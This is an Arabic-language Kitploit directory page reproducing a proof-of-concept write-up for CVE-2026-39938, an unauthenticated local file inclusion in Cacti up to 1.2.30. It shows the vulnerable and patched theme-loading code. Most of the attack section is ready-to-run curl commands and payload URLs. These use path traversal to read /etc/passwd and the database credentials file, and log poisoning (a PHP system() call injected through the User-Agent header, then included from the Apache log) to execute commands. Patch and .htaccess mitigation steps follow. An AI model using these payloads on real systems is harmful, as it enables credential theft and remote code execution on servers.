Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
By-Poloss..-..CVE-2026-39938 — برهان المفهوم لثغرة CVE-2026-39938: تضمين ملف محلي غير مصادق عليه في Cacti <= 1.2.30، مما يتيح قراءة الملفات التعسفية وتنفيذ التعليمات البرمجية عن بُعد عبر تسميم السجلات. | Kitploit
أدوات/GitHubGitHub/polosss/by-poloss..-..cve-2026-39938
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubpolosss/by-poloss..-..cve-2026-39938

By-Poloss..-..CVE-2026-39938

برهان المفهوم لثغرة CVE-2026-39938: تضمين ملف محلي غير مصادق عليه في Cacti <= 1.2.30، مما يتيح قراءة الملفات التعسفية وتنفيذ التعليمات البرمجية عن بُعد عبر تسميم السجلات.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-39938: كاكتي <= 1.2.30 - تضمين ملف محلي غير مصادق عليه

ملخص تنفيذي

الحقلالقيمة
معرف CVECVE-2026-39938
درجة CVSS9.8 (حرج)
المنتج المتأثرCacti
الإصدارات المتأثرة<= 1.2.30
الإصدار المُصحَّح1.2.31
تعهيد التصحيح9871f0c

تفاصيل الثغرة

السبب الجذري

توجد الثغرة في lib/rrd.php حيث يتم استخدام المُعامل graph_theme مباشرة دون تنقية:

الكود الضعيف:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $rrdtheme = $config['base_path'] . '/include/themes/' . $graph_data_array['graph_theme'] . '/rrdtheme.php';
}

الكود المُصحَّح:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $theme = basename($graph_data_array['graph_theme']);
    if ($theme === '' || $theme === '.' || $theme === '..') {
        $theme = get_selected_theme();
    }
    $rrdtheme = $config['base_path'] . '/include/themes/' . $theme . '/rrdtheme.php';
}

المشكلة: عدم التحقق من تسلسلات اجتياز المسار ../، مما يسمح للمهاجمين بقراءة ملفات عشوائية دون مصادقة.


إثبات المفهوم (PoC) - خطوات بسيطة

الخطوة 1: التحقق من الثغرة - قراءة /etc/passwd

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd"

النتيجة: سيتم عرض محتويات /etc/passwd في الاستجابة.

الخطوة 2: قراءة إعدادات قاعدة البيانات

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php"

النتيجة: سيتم كشف بيانات اعتماد قاعدة البيانات (اسم المستخدم، كلمة المرور).

الخطوة 3: تنفيذ الأوامر عن بُعد عبر تسميم السجلات

3.1 حقن كود PHP في سجل Apache

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?local_graph_id=1" \
  -H "User-Agent: <?php system('id'); ?>"

3.2 تنفيذ الكود عن طريق تضمين ملف السجل

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"

النتيجة: سيتم عرض مخرجات الأمر (مثل uid=33(www-data)).


النقاط النهائية المختبرة الشائعة


أمثلة عناوين URL لـ PoC

اختبار LFI أساسي

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd

قراءة إعدادات التطبيق

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php

تسميم السجلات (الحقن)

root@kitploit:~
http://target-cacti/graph_image.php?local_graph_id=1

مع الرأس: User-Agent: <?php system('id'); ?>

تسميم السجلات (التنفيذ)

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log

المعالجة

التحديث إلى الإصدار المُصحَّح

root@kitploit:~
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31

التحقق من تطبيق التصحيح

root@kitploit:~
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename

التخفيف المؤقت (.htaccess)

root@kitploit:~
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]

المراجع

  • إشعار أمان GitHub
  • تعهيد التصحيح 9871f0c
  • NVD CVE-2026-39938

W.P.E.F

  • قناة W.P.E.F على تيليغرام #1
  • قناة W.P.E.F على تيليغرام #2

تم إنشاء التقرير لأغراض البحث الأمني التاريخ: 27 يونيو، 2026

تنزيل الأداة
النقطة النهائيةالمُعاملمثال للحمولة
/graph_image.phpgraph_theme../../../../../../../etc/passwd
/graph_image.phpgraph_theme../../../../include/config.php
/graph_image.phpgraph_theme../../../../../../../var/log/apache2/access.log